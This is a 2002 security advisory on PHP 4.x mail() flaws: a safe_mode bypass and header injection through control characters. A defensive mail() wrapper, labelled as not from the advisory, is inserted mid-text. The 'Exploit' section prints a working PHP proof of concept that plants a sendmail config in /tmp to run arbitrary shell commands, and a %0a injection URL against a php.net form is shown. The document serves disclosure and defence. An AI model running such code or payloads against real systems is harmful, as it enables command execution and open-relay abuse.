PHP: Bypass safe_mode and inject ASCII control chars with mail()

From: Wojciech Purczynski (cliphat_private)
Date: Fri Aug 23 2002 - 00:30:40 PDT


    
    Product:	PHP
    Version: 	4.x up to 4.2.2
    Vendor:		http://www.php.net/
    Author:		Wojciech Purczynski <cliphat_private>
    Date:		June 13, 2002
    Updated:	August 23, 2002
    Released:	August 21, 2002
    
    
    Issue:
    ======
    
    Two vulnerabilities exist in the PHP mail() function. The first allows
    executing any program or script, bypassing the safe_mode restriction; the
    second may turn a script into an open relay if the mail() function is not
    used carefully in PHP scripts.
    
    
    Description:
    ============
    
    PHP is a widely-used general-purpose scripting language that is especially 
    suited for Web development and can be embedded into HTML.
    
    
    Details:
    ========
    
    (1) Bypassing safe_mode restriction
    
    If PHP is configured with the safe_mode option enabled, special restrictions
    are set up, including a limit on the external binaries that may be executed
    from within a PHP script.
    
    The 5th argument to the mail() function (introduced in version 4.0.5)
    allows specifying command line options for the sendmail binary. Some time
    ago a bug was found in the mail() function allowing shell meta-characters
    to be passed in the 5th argument, leading to the execution of arbitrary
    shell commands or external binaries. This bug was fixed in version 4.1.0.
    
    However, the mail() function is still vulnerable because it allows passing
    command line arguments to the sendmail binary, which gives the ability to
    influence its behavior (e.g. by using non-default aliases or custom
    configuration files; other cases are possible with other MTAs).
    
    Passing the 5th argument should be disabled if PHP is configured in safe_mode.
    
    Exploit attached at the end.
    
    (2) Injecting ASCII control characters into mail() arguments
    
    Arbitrary ASCII control characters may be injected into the string
    arguments of the mail() function. If mail() arguments are taken from user
    input, this may give the user the ability to alter the message content,
    including mail headers.
    
    An example of such a vulnerability may be found on the PHP.net site:
    
    (URL wrapped for readability)
    http://www.php.net/mailing-lists.php?
    	maillist=yourat_private%0a&email=fakeat_private%0a
    
    PHP should do content filtering before creating the message body sent
    with the "sendmail -t" command.
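    As an added example (not code from the advisory, from PHP or from PHP.net), a
    defensive mail() wrapper covering both issues above: it refuses ASCII control
    characters in the recipient, subject and caller-supplied headers, and it never
    forwards a 5th argument to mail(). The function names, the header allowlist
    and the sample addresses are my own constructions.

```php
<?php
// Added example (not from the advisory): a mail() wrapper that closes the two
// abuse paths described above. No caller-supplied 5th argument ever reaches
// mail(), and any header or recipient value carrying a control character
// (NUL, TAB, CR, LF, ...) is rejected instead of being written into the message.

function has_control_chars(string $s): bool {
    // 0x00-0x1F and 0x7F; CR and LF are the characters that start a new header.
    return preg_match('/[\x00-\x1F\x7F]/', $s) === 1;
}

function safe_header_line(string $name, string $value): string {
    if (has_control_chars($name) || has_control_chars($value)) {
        throw new InvalidArgumentException("control character in header $name");
    }
    return "$name: $value";
}

function send_mail_safely(string $to, string $subject, string $body, array $headers = []): bool {
    // Exactly one syntactically valid recipient, with no control characters.
    if (has_control_chars($to) || filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException("invalid recipient");
    }
    if (has_control_chars($subject)) {
        throw new InvalidArgumentException("control character in subject");
    }
    // Hypothetical allowlist: only these headers may be set by the caller.
    $allowed = ['From', 'Reply-To', 'Content-Type'];
    $lines = [];
    foreach ($headers as $name => $value) {
        if (in_array($name, $allowed, true)) {
            $lines[] = safe_header_line($name, $value);
        }
    }
    // Deliberately no 5th argument: nothing from the caller reaches the sendmail command line.
    return mail($to, $subject, $body, implode("\r\n", $lines));
}

// Constructed inputs modelled on the advisory's "%0a" URL: the decoded newline
// must cause rejection rather than ending up inside the generated headers.
$inputs = ["user@example.org", "fake@example.org\n"];
foreach ($inputs as $addr) {
    try {
        $ok = send_mail_safely($addr, "List subscription", "Welcome", ['From' => 'lists@example.org']);
        echo json_encode($addr) . " => " . ($ok ? "handed to the MTA" : "mail() failed") . "\n";
    } catch (InvalidArgumentException $e) {
        echo json_encode($addr) . " => rejected: " . $e->getMessage() . "\n";
    }
}
```

    On a host without a configured MTA the first address reports "mail() failed"; the second is rejected before mail() is called at all.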
    
    
    Impact:
    =======
    
    (1) Any user may bypass safe_mode restrictions if the mail() function is
        not disabled.
    (2) A PHP script becomes an open relay if user data is poorly filtered or
        unfiltered and passed to the mail() function.
    
    
    Exploit:
    ========
    
    Sample exploit for (1) that works with the sendmail MTA:
    
    -----8<----- bypass_safe_mode.php -----8<-----
    <?
    $script=tempnam("/tmp", "script");
    $cf=tempnam("/tmp", "cf");
    
    $fd = fopen($cf, "w");
    fwrite($fd, "OQ/tmp
    Sparse=0
    R$*" . chr(9) . "$#local $@ $1 $: $1
    Mlocal, P=/bin/sh, A=sh $script");
    fclose($fd);
    
    $fd = fopen($script, "w");
    fwrite($fd, "rm -f $script $cf; ");
    fwrite($fd, $cmd);
    fclose($fd);
    
    mail("nobody", "", "", "", "-C$cf");
    ?>
    -----8<----- bypass_safe_mode.php -----8<-----
    
    
    Fix:
    ====
    
    (1) has been successfully fixed in the latest CVS snapshot. The fix for
    (2) is not sufficient: it is still possible to inject ASCII control
    characters that cause the argument string to be truncated. Please refer to
    the example URL mentioned above.
    
    These bugs haven't been fixed yet in the latest 4.2.2 stable release.
    
    
    -- 
    Wojciech Purczynski
    iSEC Security Research
    http://isec.pl/
    
    
    
    